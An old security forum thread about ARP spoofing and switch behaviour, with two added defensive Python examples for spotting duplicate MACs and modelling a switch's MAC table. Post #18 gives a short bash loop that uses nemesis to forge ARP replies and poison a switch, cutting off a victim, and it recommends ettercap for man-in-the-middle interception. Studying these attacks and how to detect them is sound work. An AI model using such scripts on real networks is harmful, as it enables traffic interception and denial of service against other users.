-
August 16th, 2004, 04:13 PM
#11
Junior Member
I have a quick question on this matter: I have a local network consisting of a proxy server to the internet, a w2k box and a linux box. The three boxes are connected using a layer 2 (hw address) switch.
I spoofed the mac address of the linux box using ifconfig to the mac address of the w2k box. So in the arp tables of the proxy, both the linux and the w2k box have the same mac address. However, when I run tcpdump on the linux box, and I start surfing the net using the w2k box, I do not see the packets of the w2k box on the linux box, even though they both have the same mac address.
How is this possible? Does the switch only forward packages to 1 port and refuse 2?
It got me puzzled. I expected to see the w2k packages on the linux machine after the spoof.
There are 10 kinds of people, those who can read binary, and those who can't.
-
August 16th, 2004, 10:29 PM
#12
Honestly, I’m not quite sure of the intricacies of the software/circuitry built into a switch. Has the Linux box sent any traffic to the network so the switch can notice its MAC address? Any other ideas guys?
-
August 16th, 2004, 10:34 PM
#13
What does the ARP table on the switch say about the MAC addresses? After all, the way you described it, it will be the final arbiter.
Don't SYN us.... We'll SYN you.....
"A nation that draws too broad a difference between its scholars and its warriors will have its thinking done by cowards, and its fighting done by fools." - Thucydides
-
August 16th, 2004, 11:27 PM
#14
Re: The Basics of Arpspoofing/Arppoisoning
Irongeek,
It's a very nice basic tutorial. However I would like to have seen a "securing your network" section that could mention how to employ certain technologies to secure your network against ARP-based attacks. Also, some mention of non-MITM attacks using ARP might be handy (such as a network-wide DoS), as well as how to prevent them. Maybe a second tutorial that might mention these things, if you have any interest?
Chris Shepherd
The Nelson-Shepherd cutoff: The point at which you realise someone is an idiot while trying to help them.
"Well as far as the spelling, I speak fluently both your native languages. Do you even can try spell mine ?" -- Failed Insult
Is your whole family retarded, or did they just catch it from you?
-
August 17th, 2004, 12:05 AM
#15
Originally posted here by Tiger Shark
What does the ARP table on the switch say about the MAC addresses? After all, the way you described it, it will be the final arbiter.
That's what I thought... but then I got to thinking... can you even look at the mac table of a layer 2 switch? All of the layer two switches I have are not managed and I can't see the table. The ones that are managed are layer 2 and layer 3....
Maybe you just have to wait for the switch to update its table?
Quitmzilla is a firefox extension that gives you stats on how long you have quit smoking, how much money you've saved, how much you haven't smoked and recent milestones. Very helpful for people who quit smoking and used to smoke at their computers... Helps out with the urges.
-
August 17th, 2004, 04:47 AM
#16
Re: Re: The Basics of Arpspoofing/Arppoisoning
Originally posted here by chsh
Irongeek,
It's a very nice basic tutorial. However I would like to have seen a "securing your network" section that could mention how to employ certain technologies to secure your network against ARP-based attacks. Also, some mention of non-MITM attacks using ARP might be handy (such as a network-wide DoS), as well as how to prevent them. Maybe a second tutorial that might mention these things, if you have any interest?
I would be interested in writing such a tutorial, but doubt I have the resources to do it justice. I know of a few ways ARP spoofing can be used for DoS (like spoofing the gateway and turning off packet forwarding, or assuming the MAC address of an antenna in an Axon system) and I have ideas for possible solutions, but I don’t have the privileges on my network to really test them to make sure the fixes work.
-
August 17th, 2004, 07:33 AM
#17
Junior Member
Well, the linux box was sending packets too. After the mac spoof, both machines behaved as before. I'm sure the linux mac was spoofed, 'cause when I looked at the arp table on the router, it listed the 2 IP addresses (one of the linux box, the other one of the w2k box) both with the same mac address. I just don't understand how, if a switch's "routing table" is based on the mac address, it is still able to work properly when it has 2 mac addresses that are the same. Only explanation could be that the switch somehow got hold of the real mac address. So my spoofing was not effective.
Anyway, many thanks for the replies, and thanks for the great tutorial!
There are 10 kinds of people, those who can read binary, and those who can't.
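The condition described in the post above, two IP addresses resolving to one MAC address in a host's ARP table, can be checked for automatically. The following is an added example, not part of any post in this thread; it assumes the line format printed by `arp -an` on Linux, and the sample table is constructed.

```python
import re
from collections import defaultdict

# Constructed sample in the format printed by `arp -an` on Linux (assumed format).
SAMPLE_ARP_OUTPUT = """\
? (192.168.0.1) at 00:50:56:aa:bb:01 [ether] on eth0
? (192.168.0.10) at 00:0c:29:12:34:56 [ether] on eth0
? (192.168.0.11) at 00:0C:29:12:34:56 [ether] on eth0
? (192.168.0.12) at <incomplete> on eth0
"""

# One resolved entry: "(ip) at aa:bb:cc:dd:ee:ff"
ENTRY = re.compile(
    r"\((?P<ip>\d{1,3}(?:\.\d{1,3}){3})\) at "
    r"(?P<mac>[0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2}){5})\b"
)


def parse_arp_table(text):
    """Return {ip: mac} for every resolved entry; unresolved entries are skipped."""
    table = {}
    for line in text.splitlines():
        match = ENTRY.search(line)
        if match:
            # Normalise case so 00:0C:... and 00:0c:... compare equal.
            table[match.group("ip")] = match.group("mac").lower()
    return table


def shared_macs(table):
    """Return {mac: sorted list of IPs} for MACs that more than one IP resolves to."""
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


if __name__ == "__main__":
    for mac, ips in shared_macs(parse_arp_table(SAMPLE_ARP_OUTPUT)).items():
        print(f"{mac} is claimed by {', '.join(ips)}")
```

A shared MAC is not always hostile: a host with several IP addresses on one interface, or a device doing proxy ARP, produces the same pattern, so a hit is a prompt to investigate rather than a verdict.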
-
August 17th, 2004, 10:04 AM
#18
Travish,
the switch doesn't have two IP addresses in its arp table, it just updated the mac address with the IP address from the victim to the attacker's IP address, so you will cut off the victim in this example.
Now if you'd try a man-in-the-middle attack (in this example sit between the switch and the victim), with let's say ettercap, you'd poison in two directions, thus in the arp table of the switch you'd see the victim's IP address with the attacker's mac address, and the other way around on the victim's arp table. In this example the victim would still be able to communicate and surf, while you read what he's doing with for ex. tcpdump or another sniffer.
Anyway try ettercap for the mitm-attack, and this to see the difference:
Code:
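#!/bin/bash
# Send one ARP reply per second, 1000 times in total.
counter=0
while [ "$counter" != 1000 ]; do
    sleep 1
    nemesis arp -S <victim-ip> -D <switch-ip> -m <attacker-mac> -r
    counter=$((counter + 1))   # advance the counter so the loop ends after 1000 replies
done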
This is a very simple script to temporarily poison a switch, but which would create a victim cut-off. The -r is crucial 'cause it tells it that it's an arp-reply.
If you tcpdump then on your attacker box, you'd see all present connections originally to the victim's box continuing on the attacker box.
-
August 17th, 2004, 10:20 AM
#19
Junior Member
Hey Schrekkie,
Thx for the reply. I think indeed my problem is I don't understand what's happening in the switch. Anyway, for the moment, the victim is not cut off, even after spoofing. I'll reboot the switch after spoofing, who knows, maybe that has something to do with it.
After that I'll try the mitm attack, as explained by you and the tutorial. See how that works.
There are 10 kinds of people, those who can read binary, and those who can't.
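Since the thread keeps returning to what happens inside the switch, here is a simplified model of a layer 2 learning switch, as an added example that is not part of any post. It assumes the textbook behaviour (one port per MAC, learned from source addresses, no entry ageing); the class, port numbers and MAC addresses are constructed for illustration. It also records the MAC-move events that a managed switch can log, which is the defender's signal that one address has appeared on two ports.

```python
class LearningSwitch:
    """Minimal model of a layer 2 switch's MAC table (one port per MAC)."""

    def __init__(self, ports):
        self.ports = set(ports)
        self.mac_table = {}  # MAC -> port where it was last seen as a source
        self.moves = []      # (mac, old_port, new_port) events worth alerting on

    def receive(self, in_port, src, dst):
        """Learn src on in_port, then return the set of ports the frame leaves on."""
        old = self.mac_table.get(src)
        if old is not None and old != in_port:
            self.moves.append((src, old, in_port))  # same MAC seen on another port
        self.mac_table[src] = in_port
        out = self.mac_table.get(dst)
        if out is None:
            return self.ports - {in_port}           # unknown destination: flood
        return set() if out == in_port else {out}   # known: exactly one port


def demo():
    # Constructed topology: proxy on port 1, w2k on port 2, linux on port 3.
    proxy, shared = "00:50:56:aa:bb:01", "00:0c:29:12:34:56"
    sw = LearningSwitch([1, 2, 3])
    sw.receive(2, shared, proxy)                 # w2k sends a frame
    to_w2k = sw.receive(1, proxy, shared)        # reply leaves on port 2 only
    sw.receive(3, shared, proxy)                 # same MAC now sourced on port 3
    after_move = sw.receive(1, proxy, shared)    # table entry was overwritten
    return to_w2k, after_move, sw.moves


if __name__ == "__main__":
    first, second, moves = demo()
    print("before move:", first, "after move:", second, "logged moves:", moves)
```

The frame is never delivered to both ports at once: the table holds a single port per MAC, and every change of that port is an event that can be logged and alerted on.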
-
August 17th, 2004, 10:38 AM
#20
Member
Errrrr guys, would we get flamed for participating in this discussion of doing this illegal stuff?